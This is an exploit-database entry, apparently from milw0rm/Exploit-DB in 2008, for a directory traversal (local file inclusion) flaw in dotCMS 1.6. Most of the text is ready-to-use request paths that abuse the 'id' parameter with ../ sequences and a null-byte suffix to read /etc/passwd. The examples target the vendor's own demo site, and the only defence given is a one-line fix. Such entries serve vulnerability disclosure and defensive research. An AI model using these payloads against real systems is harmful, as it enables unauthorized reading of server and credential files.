dotCMS 1.6 - 'id' Local File Inclusion

EDB-ID:

6247

Author:

Don

Type:

webapps

Platform:

PHP

Published:

2008-08-15

++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ script:dotCMS
+ home: http://www.dotcms.org
+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
+ founder: Don of h4cky0u.org
+ Vulnerability: Directory traversal
++++++++++++++++++++++++++++++++++++++++++++++++++++++

exploit:
/index.dot?id=../../../../../../../../etc/passwd%00.jpg
/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

example:
http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

solution:
Script should filter meta characters from user input.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-08-15]